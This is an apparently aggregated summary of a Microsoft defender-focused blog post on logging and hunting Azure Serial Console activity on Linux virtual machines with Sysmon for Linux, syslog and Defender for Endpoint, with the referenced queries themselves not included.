This is the second installment of the Azure Serial Console blog, which provides insights to improve defenders' preparedness when investigating Azure Serial Console activity on Azure Linux virtual machines.
While the first blog post discussed various tracing activities, such as using Azure activity and Sysmon logs on Windows virtual machines to trace serial console activity, this blog outlines how to enable logging for Azure Linux virtual machines using Sysmon for Linux to capture and how to send these events to a log analytics workspace.
The goal extends beyond identifying serial console activity on Linux virtual machines, to using these artifacts to create additional hunting queries for detecting potential abuse by attackers.
This section of the blog covers how to log Azure Linux virtual machine events using Sysmon for Linux and Microsoft Defender for Endpoint agents to capture the Azure serial console activity artifacts.
The evidence of accessing a virtual machine using serial console can be found in native Syslog and Sysmon for Linux logs on virtual machine.
The Serial console connection happens over /dev/ttyS0 on Linux virtual machines.
Identify launching of serial console to access a Linux virtual machine, it will initiate connection on ttyS0 and show an authentication prompt with username and password to login into the virtual machine.
Discover successful virtual machine access using Serial console in Syslog native logs.
Find Failed login attempts to connect to virtual machine using Serial console.
The use of 'sudo' after a successful authentication using serial console will be captured in syslog authpriv logs with the command being executed with 'sudo' and the commands with 'sudo' will also be captured.
Every process on a Linux virtual machine using the serial console has a unique parent process & command line.
The below query can identify all public network connections from the processes executed on a virtual machine using serial console.
Microsoft Defender for Endpoint captures Azure serial console activity for a Linux virtual machine.
Serial console connections to the Linux virtual machine are established on virtual console terminals with device /dev/vc/.
The below Kusto query for MDE will identify logged in users using serial console.
The following are a few examples by using which a defender can detect suspicious activity around Azure serial console.
An attacker can gain initial access through the Azure serial console, and any activity following this access can be identified using the serial console spawned process lineage.
In addition to the hunting techniques mentioned in Part 1, anomalous serial console connect activity can be identified using the following query.
While Azure Serial Console is a beneficial feature that allows developers and administrators to troubleshoot during challenging times, it can become a security liability if not properly monitored and secured.
This blog highlighted several opportunities for detecting malicious activity pertaining to Azure serial console.
This Cyber News was published on msrc.microsoft.com. Publication date: Wed, 20 Dec 2023 01:13:06 +0000